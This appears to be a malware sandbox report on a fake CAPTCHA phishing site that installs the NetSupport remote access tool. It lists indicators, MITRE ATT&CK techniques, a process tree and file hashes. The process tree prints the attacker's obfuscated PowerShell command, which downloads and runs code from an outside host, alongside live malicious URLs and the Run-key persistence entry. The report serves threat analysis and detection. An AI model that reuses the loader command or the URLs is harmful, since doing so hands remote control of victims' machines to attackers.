netsupport | hxxp://holidaybunch[.]com

Analysis

max time kernel
145s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-10-2024 12:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://holidaybunch.com

Score

10^/10

netsupport defense_evasion discovery persistence phishing rat

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://holidaybunch.com/Ray-verify.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://traversecityspringbreak.com/o/o.png

Extracted

Language

hta

Source

URLs

hta.dropper

http://holidaybunch.com/Ray-verify.html

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 4 IoCs

flow	pid	Process
78	6120	mshta.exe
80	5252	powershell.exe
102	5904	mshta.exe
104	6020	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
5764	client32.exe
5624	client32.exe

Loads dropped DLL 9 IoCs

pid	Process
5764	client32.exe
5764	client32.exe
5764	client32.exe
5764	client32.exe
5764	client32.exe
5624	client32.exe
5624	client32.exe
5624	client32.exe
5624	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\mKzlXy\\client32.exe"	powershell.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5168	cmd.exe
4064	cmd.exe

Detected phishing page
phishing
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4724	ipconfig.exe
1044	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4976	msedge.exe
4976	msedge.exe
1148	msedge.exe
1148	msedge.exe
3252	identity_helper.exe
3252	identity_helper.exe
5252	powershell.exe
5252	powershell.exe
5252	powershell.exe
6020	powershell.exe
6020	powershell.exe
6020	powershell.exe
5164	msedge.exe
5164	msedge.exe
5164	msedge.exe
5164	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5252	powershell.exe
Token: SeSecurityPrivilege	5764	client32.exe
Token: SeDebugPrivilege	6020	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
5764	client32.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe
1148	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1148 wrote to memory of 4068	1148	msedge.exe	84
PID 1148 wrote to memory of 4068	1148	msedge.exe	84
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 3496	1148	msedge.exe	85
PID 1148 wrote to memory of 4976	1148	msedge.exe	86
PID 1148 wrote to memory of 4976	1148	msedge.exe	86
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87
PID 1148 wrote to memory of 3840	1148	msedge.exe	87

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5164	attrib.exe
5356	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://holidaybunch.com
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff837e746f8,0x7ff837e74708,0x7ff837e74718
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:3496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:2872
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:2384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:2264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,6013585937414877502,12666226418694869971,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5236 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4748

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:980

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://holidaybunch.com/Ray-verify.html
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:6120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5252
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /flushdns
    3⤵
    - Gathers network information
    PID:1044
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\mKzlXy
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:5168
  - - C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\AppData\Roaming\mKzlXy
      4⤵
      Views/modifies file attributes
      PID:5164
- - C:\Users\Admin\AppData\Roaming\mKzlXy\client32.exe
    "C:\Users\Admin\AppData\Roaming\mKzlXy\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5764

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://holidaybunch.com/Ray-verify.html 'Verify you are human - Ray Verification ID: 5230'
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:5904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6020
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /flushdns
    3⤵
    - Gathers network information
    PID:4724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\ptMurl
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:4064
  - - C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\AppData\Roaming\ptMurl
      4⤵
      Views/modifies file attributes
      PID:5356
- - C:\Users\Admin\AppData\Roaming\ptMurl\client32.exe
    "C:\Users\Admin\AppData\Roaming\ptMurl\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
253B

MD5
e54bd90687c7a48c962af4fef19e2169

SHA1
12f2e25af1d9b83e44165bdbe607a5cf8b6c709e

SHA256
d4b137c5ce43c6a01ae5914e409a00bda79d58e239d8fc3d7d9f358188bc695e

SHA512
ecdbe859ff50374db5bf9c5082dfddb966840d925ea32d0b18a4337a7e0078712f37d72cd2383baa4e6344df5e3be43553fa3d6793967249d7319384bcc13750

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
06a617dd093d3db692ec12ddbc957339

SHA1
ea37c007abfa89e92b7a1c3e274c3704d51403ef

SHA256
11f39a124ad8f3b8c8c83e37e8d94673bed0f507425827672dcff1ed0ec2501a

SHA512
e6d0132a2fedfa3fa730e4f73e6cce0dc86e308a9a57ac5a0244d6313eb78576a6e98d29ee84cf82ed38c43ce7dadf1ee9190f452569bb6dbef97972d4e035d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e301f8c9b3f7a4e8d5b508860e0a113e

SHA1
82db3b1d0430c2e57eac72f94e91a6bfa69c2001

SHA256
16287130c544976be27346763c30c38bc8682c2ecb44205e184cec6fb2ea3dbf

SHA512
68b3c304bc198ea3c8b17134a6cf50d9044dd65054470644b65e46747f99d5737c5c0d1ad765a29a7436acdf0edb0aabda32bed9d7254cd5aa16416ba22bab2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8d8319743c19aacbba25c94195518300

SHA1
d00a3b6df80420a8f6bfd11dec22ba09afbe5719

SHA256
d63d5254c66469a13b1dd590f0d728e4e6df812d67553432ddf31ef914b963c3

SHA512
2eea27dba3695882b4c3b61c10898a3283bbede217ecf1cac6cf277a4d8f150a1d63ba24c305175fd2715f9f6ae055a1244c3378ab4f78dd5ffde30b24622393

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
376f8cf200599834f48a21c8011f3ab8

SHA1
c96ce64ca3e2aded35e95dfb351122bcac0d7602

SHA256
886e2b9a5719b12c7144e338b0a222f8d797441d83f293cb5a84ad099be85bf3

SHA512
fd2c0a1c5d27dca44f9604fee02b6798e57aad2f4c398fa7f448f4a225cad43425c10064fac9e690145ed85bd6a17094ca6117bb8c4669540d1941e8fe05ad6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
0150341eac8b6915a355a79a394e6a5a

SHA1
9acb060e5adaa8868f142f71ae90b855374306c2

SHA256
1d471954dfd27f7520fec4cf91ea688881464733bab06e10f8845b07506267a9

SHA512
8bc3213446030bca448857656b468c90be82ec1196cdc76c97b335bc6fdbb90e92175486c8a0e42c4c43a42f5e4e41391356605eae04ede47ed588205072d9cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FQRZN8O7\Ray-verify[1].htm

Filesize
10KB

MD5
977bb6913b1f65a6472727ea4f362e97

SHA1
1d1247a8f9359576c913e9586d72f0d51773b22c

SHA256
cace794532ffc2a8275c86e4248ca38cf85dfb209d630e05e049d6fe2047ea2e

SHA512
02e3d08afed87051cd5d7de046cfece58731901ef985f8a76e4110130ed4a364abac06e77d124e185e146502bf4170aaf07e81272db9c100faff878acfe48efa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
747994daef870b7c802499b29a25d40e

SHA1
3835d7281c62ea0bd64865ecf36427cae19476f7

SHA256
b05c184fbf487d50a111686a0d07ac09fde094fd652788354dbeff6b9865e540

SHA512
ad0971eaf31e1d60d6c75777cb1f69eb77492714d4ea484a9e42c04e586292a6d5d8aac7b1a891fa6e7eb429480e8c4afb104c7c255c2589d0c16fdb474b8d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srxjpx1c.5vx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\mKzlXy\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\mKzlXy\NSM.LIC

Filesize
257B

MD5
7067af414215ee4c50bfcd3ea43c84f0

SHA1
c331d410672477844a4ca87f43a14e643c863af9

SHA256
2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12

SHA512
17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

Download Submit
C:\Users\Admin\AppData\Roaming\mKzlXy\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\mKzlXy\PCICL32.dll

Filesize
3.6MB

MD5
00587238d16012152c2e951a087f2cc9

SHA1
c4e27a43075ce993ff6bb033360af386b2fc58ff

SHA256
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

SHA512
637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

Download Submit
C:\Users\Admin\AppData\Roaming\mKzlXy\client32.exe

Filesize
117KB

MD5
ee75b57b9300aab96530503bfae8a2f2

SHA1
98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

SHA256
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

SHA512
660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

Download Submit
C:\Users\Admin\AppData\Roaming\mKzlXy\client32.ini

Filesize
617B

MD5
7c6854f484a279e9642d2daa9fbb9993

SHA1
dc6b5cf18eb9b38819eae455d3672eed0ef32c69

SHA256
11d81c68223fb9f7b0f6e67225aa6239a5ba84b2639294cf93b759fdcf30e35c

SHA512
